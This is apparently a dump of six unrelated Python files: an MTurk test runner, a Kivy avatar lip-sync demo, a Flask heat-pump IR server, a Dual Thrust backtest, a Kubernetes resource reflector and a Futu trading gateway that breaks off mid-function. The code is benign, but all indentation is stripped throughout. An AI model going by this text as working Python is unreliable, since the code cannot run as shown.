SOLO_REFRESH_TEST: test_solo_refresh_in_middle,
SOLO_NO_ONBOARDING_TEST: test_solo_no_onboarding,
COUNT_COMPLETE_TEST: test_count_complete,
SOCKET_TEST: test_socket_manager,
AMAZON_SNS_TEST: test_sns_service,
}
# Runtime threads. MAX_THREADS is used on the initial pass; RETEST_THREADS is
# used for flaky tests that failed under heavy load and thus may not have met
# the expected times for updating state
MAX_THREADS = 8
RETEST_THREADS = 2
def run_tests(tests_to_run, max_threads, base_opt, server_url):
global start_time
failed_tests = []
threads = {}
for test_name in tests_to_run:
while len(threads) >= max_threads:
new_threads = {}
for n in threads:
if threads[n].is_alive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
new_thread = threading.Thread(target=TESTS[test_name],
args=(base_opt.copy(), server_url))
new_thread.start()
start_times[test_name] = time.time()
threads[test_name] = new_thread
time.sleep(0.25)
while len(threads) > 0:
new_threads = {}
for n in threads:
if threads[n].is_alive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
return failed_tests
def main():
start_time = time.time()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
base_opt = argparser.parse_args()
base_opt['is_sandbox'] = True
base_opt['num_conversations'] = 1
base_opt['count_complete'] = False
task_name, server_url = handle_setup(base_opt)
print("Setup time: {} seconds".format(time.time() - start_time))
start_time = time.time()
try:
failed_tests = run_tests(TESTS, MAX_THREADS, base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed: ", failed_tests)
print("Retrying flakey tests with fewer threads")
flakey_tests = {}
for test_name in failed_tests:
flakey_tests[test_name] = TESTS[test_name]
failed_tests = run_tests(flakey_tests, RETEST_THREADS,
base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed even on retry: ", failed_tests)
test_duration = time.time() - start_time
print("Test duration: {} seconds".format(test_duration))
except Exception:
raise
finally:
handle_shutdown(task_name)
if __name__ == '__main__':
mturk_utils.setup_aws_credentials()
main()
|
concept.py
|
import threading
import matplotlib.figure
import time
import numpy as np
import pyaudio
from kivy.app import App
from kivy.config import Config
from kivy.clock import mainthread
from kivy.core.image import Image
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
from kivy.graphics.context_instructions import Color
from kivy.graphics.vertex_instructions import Rectangle
from kivy.properties import BooleanProperty
from kivy.uix.slider import Slider
from kivy.uix.switch import Switch
from kivy.uix.widget import Widget
CHUNKSIZE = 2048
RATE = 44100
avatar = None
plot_widget = None
Config.read("concept.rc")
Config.adddefaultsection("avatar")
Config.setdefault("avatar", "volume", .5)
Config.write()
volume = Config.getfloat("avatar", "volume")
figure = matplotlib.figure.Figure()
lines = []
axs = figure.subplots(2, 1)
lines.extend(axs[0].plot(np.zeros(CHUNKSIZE)))
axs[0].set_xlim((0, CHUNKSIZE))
axs[0].set_ylim((-.2, .2))
FFT_CHUNK = 10 * CHUNKSIZE
fftfreq = np.fft.fftfreq(FFT_CHUNK, d=RATE / CHUNKSIZE / 1000000)
lines.extend(axs[1].plot(fftfreq[:FFT_CHUNK // 2], np.zeros(FFT_CHUNK // 2)))
axs[1].plot([0, FFT_CHUNK], [1, 1], "r-")
axs[1].set_ylim((0, 2))
axs[1].set_xlim((0, 3000))
plot_active = False
@mainthread
def plot(y):
lines[0].set_ydata(y)
fft = np.fft.fft(y, n=FFT_CHUNK)
fft = np.sqrt(np.abs(fft))
if plot_active:
lines[1].set_ydata(fft[:FFT_CHUNK // 2])
figure.canvas.draw()
max_freq = fftfreq[np.argmax(fft[:FFT_CHUNK // 2])]
max_freq_vol = fft[np.argmax(fft[:FFT_CHUNK // 2])]
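# Heuristic lip sync: open the mouth when the dominant FFT component sits
# above 100 on the frequency axis and its square-rooted magnitude exceeds 1;
# otherwise keep the mouth closed.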
if max_freq_vol > 1 and max_freq > 100:
avatar.mouth = "open"
else:
avatar.mouth = "closed"
class Avatar(Widget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
global avatar
avatar = self
self._textures = {}
with self.canvas:
Color(0., 1., 0.)
self._background = Rectangle(pos=self.pos, size=(self.width, self.width))
Color(1., 1., 1.)
self._body = Rectangle(texture=self.get_texture("body"), pos=self.pos, size=(self.width, self.width))
self._eyes = Rectangle(texture=self.get_texture("eyes.open"), pos=self.pos, size=(self.width, self.width))
self._mouth = Rectangle(texture=self.get_texture("mouth.closed"), pos=self.pos, size=(self.width, self.width))
self.bind(size=self._update_rect, pos=self._update_rect)
def _update_rect(self, instance, value):
self._background.pos = instance.pos
self._background.size = instance.size
mn = min(instance.width, instance.height)
size = (mn, mn)
pos = (instance.x + (instance.width - mn) / 2, instance.y)
self._body.pos = pos
self._body.size = size
self._eyes.pos = pos
self._eyes.size = size
self._mouth.pos = pos
self._mouth.size = size
def get_texture(self, name):
if name not in self._textures:
self._textures[name] = Image("data/images/layers/{}.png".format(name)).texture
return self._textures[name]
@property
@mainthread
def eyes(self):
raise NotImplementedError()
@eyes.setter
@mainthread
def eyes(self, value):
self._eyes.texture = self.get_texture("eyes.{}".format(value))
@property
@mainthread
def mouth(self):
raise NotImplementedError()
@mouth.setter
@mainthread
def mouth(self, value):
self._mouth.texture = self.get_texture("mouth.{}".format(value))
class Plot(FigureCanvasKivyAgg):
active = BooleanProperty(False)
def __init__(self, *args, **kwargs):
super().__init__(figure, *args, **kwargs)
global plot_widget
plot_widget = self
class PlotSwitch(Switch):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bind(active=self.on_active_change)
def on_active_change(self, instance, value):
global plot_active
plot_active = value
plot_widget.active = value
class ConceptApp(App):
pass
class VolumeSlider(Slider):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.value = volume
self.bind(value=self.on_value_change)
def on_touch_up(self, touch):
super().on_touch_up(touch)
Config.set("avatar", "volume", volume)
Config.write()
def on_value_change(self, instance, value):
global volume
volume = value
def plotter():
p = pyaudio.PyAudio()
stream = p.open(
format=pyaudio.paFloat32,
channels=1,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNKSIZE,
)
i = 0
while True:
data = stream.read(CHUNKSIZE)
# frombuffer returns a read-only view of the bytes, so copy before scaling in place
numpydata = np.frombuffer(data, dtype=np.float32).copy()
numpydata *= volume
# fft = np.abs(np.fft.fft(numpydata, n=10*CHUNKSIZE))
# ifft = np.fft.ifft(fft)[:CHUNKSIZE]
# stream.write(ifft.astype(np.float32).tostring())
if i % 2 == 0:
plot(numpydata)
i += 1
plotter_thread = threading.Thread(target=plotter)
plotter_thread.daemon = True
plotter_thread.start()
def blinker():
while True:
time.sleep(6)
avatar.eyes = "closed"
time.sleep(.1)
avatar.eyes = "open"
blinker_thread = threading.Thread(target=blinker)
blinker_thread.daemon = True
blinker_thread.start()
ConceptApp().run()
|
server.py
|
# Copyright (c) 2017 Richard Sanger
#
# Licensed under MIT
#
# A simple flask based web interface for controlling a heatpump and receiving
# current state using IR.
#
#
# * /api/set accepts a JSON object that can be posted with the settings to change
# and 'apply' indicating this state should be sent to the heatpump. This
# returns the previous state and the new state.
# * /api/status returns the current state
#
# * Also handles IR messages received, if the remote is used to control the heat
# pump the internal state will be updated with the new state information so
# it is not overwritten the next time we send a message.
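#
# A minimal usage sketch (an illustrative assumption only: it presumes the app
# is served on localhost port 80 and uses the JSON keys handled by set() and
# get_status() below):
#
#   import requests
#   # turn the heat pump on in heat mode at 22 degrees and apply immediately
#   r = requests.post('http://localhost/api/set',
#                     json={'on': True, 'hvac_mode': 'heat', 'temp': 22,
#                           'apply': True})
#   print(r.json()['prev'], r.json()['new'])
#   # read back the current state
#   print(requests.get('http://localhost/api/status').json())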
from flask import Flask, request, jsonify, abort
from heatpump import HeatPump
import sys
import os
import threading
import select
import json
import struct
try:
import urllib2
except ImportError:
import urllib.request as urllib2
try:
import cPickle as pickle
except ImportError:
import pickle
class default_config:
LIRC_PATH = "/dev/lirc0"
SAVE_STATE_PATH = None # If set save current state and load when reloaded
app = Flask(__name__)
app.config.from_object(default_config)
try:
app.config.from_envvar('SERVER_SETTINGS')
except:
pass
PULSE_BIT = 0x01000000
PULSE_MASK = 0x00FFFFFF
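# Each 4-byte word read from the LIRC device encodes one mark/space in mode2
# format: the low 24 bits (PULSE_MASK) carry the duration in microseconds and
# bit 24 (PULSE_BIT) flags pulse vs. space. For example, a raw reading of
# 0x010001F4 is a 500 us pulse, and struct.unpack('i', raw)[0] & PULSE_MASK
# recovers the 500.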
f = os.open(app.config['LIRC_PATH'], os.O_RDWR)
assert f > 0
def decode(values):
cur = None
try:
cur = HeatPump.decode(values)
except:
return
# Send an update back to ourself
req = urllib2.Request("http://localhost/api/update")
req.add_header('Content-Type', 'application/json')
try:
# urlopen expects bytes for the POST body under Python 3
response = urllib2.urlopen(req, json.dumps({'data': cur}).encode('utf-8'))
_ = json.load(response)
except:
pass
def receiver():
global f
grabbed = []
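# Collect mark/space durations; a complete heat pump frame is 583 values, and
# on a read timeout anything at least half a frame (291 values) is still
# handed to decode().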
while True:
s_res = select.select([f], [], [], 0.1)
if len(s_res[0]) and s_res[0][0] == f:
# Have data
bytes = os.read(f, 4)
assert len(bytes) == 4
as_int = struct.unpack('i', bytes)[0]
as_int = as_int & PULSE_MASK
if as_int > 1000000:
continue
grabbed.append(as_int)
if len(grabbed) == 583:
decode(grabbed)
grabbed = []
else: # timeout
if len(grabbed) >= 291:
decode(grabbed)
grabbed = []
t = threading.Thread(target=receiver)
t.daemon = True
t.start()
try:
with open(app.config['SAVE_STATE_PATH'], 'rb') as fstate:
pump = pickle.load(fstate)
except:
pump = HeatPump()
def save_state():
if app.config['SAVE_STATE_PATH']:
try:
with open(app.config['SAVE_STATE_PATH'], 'wb') as fstate:
pickle.dump(pump, fstate)
except:
pass
def program_heatpump():
""" Send current state as IR message """
global f
global pump
request = pump.encode()
written = os.write(f, request)
save_state()
assert len(request) == written
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/api/update', methods=['POST'])
def update():
if not request.json or 'data' not in request.json:
abort(400)
previous_state = pump.get_json_state()
pump.load_bytes(request.json['data'])
save_state()
return jsonify({})
@app.route('/api/set', methods=['POST'])
def set():
if not request.json or 'apply' not in request.json:
abort(400)
data = request.json
previous_state = pump.get_json_state()
if 'on' in data:
pump.on = bool(data['on'])
if 'hvac_mode' in data:
pump.hvac_mode = data['hvac_mode']
if 'temp' in data:
if isinstance(data['temp'], list):
if data['temp'][0] == '+':
pump.set_temperature(pump.temp+data['temp'][1])
else:
assert data['temp'][0] == '-'
pump.set_temperature(pump.temp-data['temp'][1])
else:
pump.set_temperature(data['temp'])
if 'wide_vane' in data:
pump.wide_vane = data['wide_vane']
if 'fan_speed' in data:
pump.set_fan(data['fan_speed'])
if 'vane' in data:
pump.vane = data['vane']
if 'clock' in data:
pump.clock = data['clock']
if 'end_time' in data:
pump.end_time = data['end_time']
# The setters below assume HeatPump exposes attributes matching these keys
if 'start_time' in data:
pump.start_time = data['start_time']
if 'prog' in data:
pump.prog = data['prog']
if 'econo_cool' in data:
pump.econo_cool = bool(data['econo_cool'])
if 'long_mode' in data:
pump.long_mode = bool(data['long_mode'])
if 'apply' in data:
if data['apply']:
program_heatpump()
return jsonify({"prev": previous_state, "new": pump.get_json_state()})
@app.route('/api/status', methods=['GET'])
def get_status():
return jsonify(pump.get_json_state())
|
dual_thrust.py
|
"""
The Dual Thrust trading algorithm is a famous strategy developed by Michael Chalek.
It is a breakout system, commonly used in futures, forex and equity markets.
The limits are based on today’s opening price plus or minus a certain percentage of recent trading range.
When the price breaks through the upper level, it will long, and when it breaks the lower level, it will short.
1. recent trading range is relatively stable, using four price points;
2. Percentage K1 and K2 can be asymmetric
https://www.quantconnect.com/tutorials/strategy-library/dual-thrust-trading-algorithm
Similar to quantconnect, got negative Sharpe -0.377.
It is an intraday breakout strategy, requires tickdata; holding position for a year is against the essence of this strategy.
Improvements: 1. profit target and stop loss. 2. confirmation e.g. MA5min>MA10min
"""
import os
import numpy as np
import pandas as pd
import pytz
from datetime import datetime, timezone
import multiprocessing
import talib
import quanttrader as qt
import matplotlib.pyplot as plt
import empyrical as ep
import pyfolio as pf
# set browser full width
from IPython.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
class DualThrust(qt.StrategyBase):
def __init__(self,
n=4, k1=0.5, k2=0.5
):
super(DualThrust, self).__init__()
self.n = n
self.k1 = k1
self.k2 = k2
self.current_time = None
def on_tick(self, tick_event):
self.current_time = tick_event.timestamp
# print('Processing {}'.format(self.current_time))
symbol = self.symbols[0]
df_hist = self._data_board.get_hist_price(symbol, tick_event.timestamp)
# need n day trading range
if df_hist.shape[0] < self.n:
return
high = df_hist.High.iloc[-self.n:]
low = df_hist.Low.iloc[-self.n:]
close = df_hist.Close.iloc[-self.n:]
current_open = df_hist.Open.iloc[-1]
current_price = df_hist.Close.iloc[-1]
current_size = self._position_manager.get_position_size(symbol)
npv = self._position_manager.current_total_capital
HH, HC, LC, LL = max(high), max(close), min(close), min(low)
signal_range = max(HH - LC, HC - LL)
selltrig = current_open - self.k2 * signal_range
buytrig = current_open + self.k1 * signal_range
if current_price > buytrig: # buy on upper break
if current_size > 0:
return
target_size = int(npv / current_price)
self.adjust_position(symbol, size_from=current_size, size_to=target_size, timestamp=self.current_time)
print(f'{self.current_time}, BUY ORDER SENT, {symbol}, Price: {current_price:.2f}, '
f'Buy trigger: {buytrig:.2f}, Size: {current_size}, Target Size: {target_size}')
elif current_price < selltrig: # sell on down break
if current_size < 0:
return
target_size = -int(npv / current_price)
self.adjust_position(symbol, size_from=current_size, size_to=target_size, timestamp=self.current_time)
print(f'{self.current_time}, SELL ORDER SENT, {symbol}, Price: {current_price:.2f}, '
f'Sell trigger: {selltrig:.2f}, Size: {current_size}, Target Size: {target_size}')
def parameter_search(engine, tag, target_name, return_dict):
"""
This function should be the same for all strategies.
The only reason not included in quanttrader is because of its dependency on pyfolio (to get perf_stats)
"""
ds_equity, _, _ = engine.run()
try:
strat_ret = ds_equity.pct_change().dropna()
perf_stats_strat = pf.timeseries.perf_stats(strat_ret)
target_value = perf_stats_strat.loc[target_name] # first table in tuple
except KeyError:
target_value = 0
return_dict[tag] = target_value
if __name__ == '__main__':
do_optimize = False
run_in_jupyter = False
symbol = 'SPX'
benchmark = 'SPX'
datapath = os.path.join('../data/', f'{symbol}.csv')
data = qt.util.read_ohlcv_csv(datapath)
init_capital = 100_000.0
test_start_date = datetime(2010,1,1, 8, 30, 0, 0, pytz.timezone('America/New_York'))
test_end_date = datetime(2019,12,31, 6, 0, 0, 0, pytz.timezone('America/New_York'))
if do_optimize: # parallel parameter search
params_list = []
for n_ in [3, 4, 5, 10]:
for k_ in [0.4, 0.5, 0.6]:
params_list.append({'n': n_, 'k1': k_, 'k2': k_})
target_name = 'Sharpe ratio'
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for params in params_list:
strategy = DualThrust()
strategy.set_capital(init_capital)
strategy.set_symbols([symbol])
backtest_engine = qt.BacktestEngine(test_start_date, test_end_date)
backtest_engine.set_capital(init_capital) # capital or portfolio >= capital for one strategy
backtest_engine.add_data(symbol, data)
strategy.set_params({'n': params['n'], 'k1': params['k1'], 'k2': params['k2']})
backtest_engine.set_strategy(strategy)
tag = (params['n'], params['k1'], params['k2'])
p = multiprocessing.Process(target=parameter_search, args=(backtest_engine, tag, target_name, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
for k,v in return_dict.items():
print(k, v)
else:
strategy = DualThrust()
strategy.set_capital(init_capital)
strategy.set_symbols([symbol])
strategy.set_params({'n':4, 'k1': 0.5, 'k2': 0.5})
# Create a Data Feed
backtest_engine = qt.BacktestEngine(test_start_date, test_end_date)
backtest_engine.set_capital(init_capital) # capital or portfolio >= capital for one strategy
backtest_engine.add_data(symbol, data)
backtest_engine.set_strategy(strategy)
ds_equity, df_positions, df_trades = backtest_engine.run()
# save to excel
qt.util.save_one_run_results('./output', ds_equity, df_positions, df_trades)
# ------------------------- Evaluation and Plotting -------------------------------------- #
strat_ret = ds_equity.pct_change().dropna()
strat_ret.name = 'strat'
bm = qt.util.read_ohlcv_csv(os.path.join('../data/', f'{benchmark}.csv'))
bm_ret = bm['Close'].pct_change().dropna()
bm_ret.index = pd.to_datetime(bm_ret.index)
bm_ret = bm_ret[strat_ret.index]
bm_ret.name = 'benchmark'
perf_stats_strat = pf.timeseries.perf_stats(strat_ret)
perf_stats_all = perf_stats_strat
perf_stats_bm = pf.timeseries.perf_stats(bm_ret)
perf_stats_all = pd.concat([perf_stats_strat, perf_stats_bm], axis=1)
perf_stats_all.columns = ['Strategy', 'Benchmark']
drawdown_table = pf.timeseries.gen_drawdown_table(strat_ret, 5)
monthly_ret_table = ep.aggregate_returns(strat_ret, 'monthly')
monthly_ret_table = monthly_ret_table.unstack().round(3)
ann_ret_df = pd.DataFrame(ep.aggregate_returns(strat_ret, 'yearly'))
ann_ret_df = ann_ret_df.unstack().round(3)
print('-------------- PERFORMANCE ----------------')
print(perf_stats_all)
print('-------------- DRAWDOWN ----------------')
print(drawdown_table)
print('-------------- MONTHLY RETURN ----------------')
print(monthly_ret_table)
print('-------------- ANNUAL RETURN ----------------')
print(ann_ret_df)
if run_in_jupyter:
pf.create_full_tear_sheet(
strat_ret,
benchmark_rets=bm_ret,
positions=df_positions,
transactions=df_trades,
round_trips=False)
plt.show()
else:
f1 = plt.figure(1)
pf.plot_rolling_returns(strat_ret, factor_returns=bm_ret)
f1.show()
f2 = plt.figure(2)
pf.plot_rolling_volatility(strat_ret, factor_returns=bm_ret)
f2.show()
f3 = plt.figure(3)
pf.plot_rolling_sharpe(strat_ret)
f3.show()
f4 = plt.figure(4)
pf.plot_drawdown_periods(strat_ret)
f4.show()
f5 = plt.figure(5)
pf.plot_monthly_returns_heatmap(strat_ret)
f5.show()
f6 = plt.figure(6)
pf.plot_annual_returns(strat_ret)
f6.show()
f7 = plt.figure(7)
pf.plot_monthly_returns_dist(strat_ret)
plt.show()
|
reflector.py
|
# specifically use concurrent.futures for threadsafety
# asyncio Futures cannot be used across threads
from concurrent.futures import Future
import time
import threading
from traitlets.config import LoggingConfigurable
from traitlets import Any, Dict, Unicode
from kubernetes import client, config, watch
from tornado.ioloop import IOLoop
class NamespacedResourceReflector(LoggingConfigurable):
"""
Base class for keeping a local up-to-date copy of a set of kubernetes resources.
Must be subclassed once per kind of resource that needs watching.
"""
labels = Dict(
{},
config=True,
help="""
Labels to reflect onto local cache
"""
)
fields = Dict(
{},
config=True,
help="""
Fields to restrict the reflected objects
"""
)
namespace = Unicode(
None,
allow_none=True,
help="""
Namespace to watch for resources in
"""
)
resources = Dict(
{},
help="""
Dictionary of resource names to the appropriate resource objects.
This can be accessed across threads safely.
"""
)
kind = Unicode(
'resource',
help="""
Human readable name for kind of object we're watching for.
Used for diagnostic messages.
"""
)
list_method_name = Unicode(
"",
help="""
        Name of the function (on the API group represented by `api_group_name`) that is called to list resources.
This will be passed a namespace & a label selector. You most likely want something
of the form list_namespaced_<resource> - for example, `list_namespaced_pod` will
give you a PodReflector.
This must be set by a subclass.
"""
)
api_group_name = Unicode(
'CoreV1Api',
help="""
Name of class that represents the apigroup on which `list_method_name` is to be found.
Defaults to CoreV1Api, which has everything in the 'core' API group. If you want to watch Ingresses,
for example, you would have to use ExtensionsV1beta1Api
"""
)
on_failure = Any(help="""Function to be called when the reflector gives up.""")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load kubernetes config here, since this is a Singleton and
# so this __init__ will be run way before anything else gets run.
try:
config.load_incluster_config()
except config.ConfigException:
config.load_kube_config()
self.api = getattr(client, self.api_group_name)()
# FIXME: Protect against malicious labels?
self.label_selector = ','.join(['{}={}'.format(k, v) for k, v in self.labels.items()])
self.field_selector = ','.join(['{}={}'.format(k, v) for k, v in self.fields.items()])
self.first_load_future = Future()
self._stop_event = threading.Event()
self.start()
def _list_and_update(self):
"""
Update current list of resources by doing a full fetch.
Overwrites all current resource info.
"""
initial_resources = getattr(self.api, self.list_method_name)(
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector
)
# This is an atomic operation on the dictionary!
self.resources = {p.metadata.name: p for p in initial_resources.items}
# return the resource version so we can hook up a watch
return initial_resources.metadata.resource_version
def _watch_and_update(self):
"""
Keeps the current list of resources up-to-date
This method is to be run not on the main thread!
We first fetch the list of current resources, and store that. Then we
register to be notified of changes to those resources, and keep our
local store up-to-date based on these notifications.
We also perform exponential backoff, giving up after we hit 32s
wait time. This should protect against network connections dropping
and intermittent unavailability of the api-server. Every time we
recover from an exception we also do a full fetch, to pick up
changes that might've been missed in the time we were not doing
a watch.
Note that we're playing a bit with fire here, by updating a dictionary
in this thread while it is probably being read in another thread
without using locks! However, dictionary access itself is atomic,
and as long as we don't try to mutate them (do a 'fetch / modify /
update' cycle on them), we should be ok!
"""
cur_delay = 0.1
while True:
self.log.info("watching for %s with label selector %s / field selector %s in namespace %s", self.kind, self.label_selector, self.field_selector, self.namespace)
w = watch.Watch()
try:
resource_version = self._list_and_update()
if not self.first_load_future.done():
# signal that we've loaded our initial data
self.first_load_future.set_result(None)
for ev in w.stream(
getattr(self.api, self.list_method_name),
self.namespace,
label_selector=self.label_selector,
field_selector=self.field_selector,
resource_version=resource_version,
):
cur_delay = 0.1
resource = ev['object']
if ev['type'] == 'DELETED':
# This is an atomic delete operation on the dictionary!
self.resources.pop(resource.metadata.name, None)
else:
# This is an atomic operation on the dictionary!
self.resources[resource.metadata.name] = resource
if self._stop_event.is_set():
break
except Exception:
cur_delay = cur_delay * 2
if cur_delay > 30:
self.log.exception("Watching resources never recovered, giving up")
if self.on_failure:
self.on_failure()
return
self.log.exception("Error when watching resources, retrying in %ss", cur_delay)
time.sleep(cur_delay)
continue
finally:
w.stop()
if self._stop_event.is_set():
self.log.info("%s watcher stopped", self.kind)
break
def start(self):
"""
Start the reflection process!
We'll do a blocking read of all resources first, so that we don't
race with any operations that are checking the state of the pod
store - such as polls. This should be called only once at the
start of program initialization (when the singleton is being created),
and not afterwards!
"""
if hasattr(self, 'watch_thread'):
raise ValueError('Thread watching for resources is already running')
self._list_and_update()
self.watch_thread = threading.Thread(target=self._watch_and_update)
# If the watch_thread is only thread left alive, exit app
self.watch_thread.daemon = True
self.watch_thread.start()
def stop(self):
self._stop_event.set()
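# A minimal, hedged sketch of a concrete subclass, following the hint in the
# list_method_name help text above ("list_namespaced_pod will give you a
# PodReflector"). The class name and trait values are illustrative only.
class PodReflector(NamespacedResourceReflector):
    kind = Unicode('pods')
    list_method_name = Unicode('list_namespaced_pod')
# Note that instantiating it (e.g. PodReflector(namespace='default')) starts the
# watch thread immediately, because __init__ calls start().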
|
futu_gateway.py
|
"""
Please install futu-api before use.
"""
from copy import copy
from collections import OrderedDict
from datetime import datetime
from threading import Thread
from time import sleep
from futu import (
KLType,
ModifyOrderOp,
TrdSide,
TrdEnv,
OpenHKTradeContext,
OpenQuoteContext,
OpenUSTradeContext,
OrderBookHandlerBase,
OrderStatus,
OrderType,
RET_ERROR,
RET_OK,
StockQuoteHandlerBase,
TradeDealHandlerBase,
TradeOrderHandlerBase
)
from vnpy.trader.constant import Direction, Exchange, Product, Status
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.gateway import BaseGateway, LocalOrderManager
from vnpy.trader.object import (
BarData,
TickData,
OrderData,
TradeData,
AccountData,
ContractData,
PositionData,
SubscribeRequest,
OrderRequest,
CancelRequest,
HistoryRequest,
Interval
)
EXCHANGE_VT2FUTU = {
Exchange.SMART: "US",
Exchange.SEHK: "HK",
Exchange.HKFE: "HK_FUTURE",
}
EXCHANGE_FUTU2VT = {v: k for k, v in EXCHANGE_VT2FUTU.items()}
PRODUCT_VT2FUTU = {
Product.EQUITY: "STOCK",
Product.INDEX: "IDX",
Product.ETF: "ETF",
Product.WARRANT: "WARRANT",
Product.BOND: "BOND",
}
DIRECTION_VT2FUTU = {
Direction.LONG: TrdSide.BUY,
Direction.SHORT: TrdSide.SELL,
}
DIRECTION_FUTU2VT = {v: k for k, v in DIRECTION_VT2FUTU.items()}
STATUS_FUTU2VT = {
OrderStatus.NONE: Status.SUBMITTING,
OrderStatus.SUBMITTING: Status.SUBMITTING,
OrderStatus.SUBMITTED: Status.NOTTRADED,
OrderStatus.FILLED_PART: Status.PARTTRADED,
OrderStatus.FILLED_ALL: Status.ALLTRADED,
OrderStatus.CANCELLED_ALL: Status.CANCELLED,
OrderStatus.CANCELLED_PART: Status.CANCELLED,
OrderStatus.SUBMIT_FAILED: Status.REJECTED,
OrderStatus.FAILED: Status.REJECTED,
OrderStatus.DISABLED: Status.CANCELLED,
}
KLTYPE_MINUTES = [1, 3, 5, 15, 30, 60]
class FutuGateway(BaseGateway):
"""
富途证券API
# 网络访问路径: vnpy=>FutuGateway=>FutuOpenD 本地客户端[端口11111] => 富途证券
# FutuOpenD下载地址 https://www.futunn.com/download/openAPI?lang=zh-CN
# windows: 安装完毕后,使用客户端登录=》短信验证=》建立本地11111端口侦听
"""
default_setting = {
"密码": "", # 交易密码
"地址": "127.0.0.1",
"端口": 11111,
"市场": ["HK", "US"],
"环境": [TrdEnv.REAL, TrdEnv.SIMULATE],
}
    # List of supported exchanges
exchanges = list(EXCHANGE_FUTU2VT.values())
def __init__(self, event_engine, gateway_name="FUTU"):
"""Constructor"""
super(FutuGateway, self).__init__(event_engine, gateway_name)
self.quote_ctx = None
self.trade_ctx = None
self.host = ""
self.port = 0
self.market = ""
self.password = ""
self.env = TrdEnv.SIMULATE
self.ticks = {}
self.trades = set()
self.contracts = {}
        # Manage the mapping between local order ids and broker (system) order ids
self.order_manager = LocalOrderManager(gateway=self, order_prefix='', order_rjust=4)
self.thread = Thread(target=self.query_data)
# For query function.
self.count = 0
self.interval = 1
self.query_funcs = [self.query_account, self.query_position]
def connect(self, setting: dict):
""""""
self.host = setting["地址"]
self.port = setting["端口"]
self.market = setting["市场"]
self.password = setting["密码"]
self.env = setting["环境"]
self.connect_quote()
self.connect_trade()
self.thread.start()
def query_data(self):
"""
        Query all required data in a separate worker thread.
"""
sleep(2.0) # Wait 2 seconds till connection completed.
self.query_contract()
self.query_trade()
self.query_order()
self.query_position()
self.query_account()
# Start fixed interval query.
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def process_timer_event(self, event):
"""定时器"""
self.count += 1
if self.count < self.interval:
return
self.count = 0
func = self.query_funcs.pop(0)
func()
self.query_funcs.append(func)
def connect_quote(self):
"""
        Connect to the market data server.
"""
self.quote_ctx = OpenQuoteContext(self.host, self.port)
        # Stock quote handler implementation
class QuoteHandler(StockQuoteHandlerBase):
gateway = self
            # Quote callback -> gateway.process_quote
def on_recv_rsp(self, rsp_str):
ret_code, content = super(QuoteHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_quote(content)
return RET_OK, content
        # Order book handler implementation
class OrderBookHandler(OrderBookHandlerBase):
gateway = self
            # Order book callback -> gateway.process_orderbook
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderBookHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_orderbook(content)
return RET_OK, content
        # Register both handlers
self.quote_ctx.set_handler(QuoteHandler())
self.quote_ctx.set_handler(OrderBookHandler())
self.quote_ctx.start()
self.write_log("行情接口连接成功")
def connect_trade(self):
"""
        Connect to the trade server.
"""
# Initialize context according to market.
if self.market == "US":
self.trade_ctx = OpenUSTradeContext(self.host, self.port)
else:
self.trade_ctx = OpenHKTradeContext(self.host, self.port)
# Implement handlers.
        # Order update handler implementation
class OrderHandler(TradeOrderHandlerBase):
gateway = self
            # Order update stream -> gateway.process_order
def on_recv_rsp(self, rsp_str):
ret_code, content = super(OrderHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_order(content)
return RET_OK, content
        # Trade (deal) update handler implementation
class DealHandler(TradeDealHandlerBase):
gateway = self
            # Deal update stream -> gateway.process_deal
def on_recv_rsp(self, rsp_str):
ret_code, content = super(DealHandler, self).on_recv_rsp(
rsp_str
)
if ret_code != RET_OK:
return RET_ERROR, content
self.gateway.process_deal(content)
return RET_OK, content
        # Unlock to allow trading.
code, data = self.trade_ctx.unlock_trade(self.password)
if code == RET_OK:
self.write_log("交易接口解锁成功")
else:
self.write_log(f"交易接口解锁失败,原因:{data}")
# Start context.
        # Register the order and deal handlers
self.trade_ctx.set_handler(OrderHandler())
self.trade_ctx.set_handler(DealHandler())
self.trade_ctx.start()
self.write_log("交易接口连接成功")
def subscribe(self, req: SubscribeRequest):
"""订阅行情"""
for data_type in ["QUOTE", "ORDER_BOOK"]:
futu_symbol = convert_symbol_vt2futu(req.symbol, req.exchange)
code, data = self.quote_ctx.subscribe(futu_symbol, data_type, True)
if code:
self.write_log(f"订阅行情失败:{data}")
def query_history(self, req: HistoryRequest):
"""查询某只股票的历史K线数据"""
history = []
limit = 60
if req.interval not in [Interval.MINUTE, Interval.DAILY]:
self.write_error(f'查询股票历史范围,本接口只支持分钟/日线')
return history
futu_code = '{}.{}'.format(EXCHANGE_VT2FUTU.get(req.exchange), req.symbol)
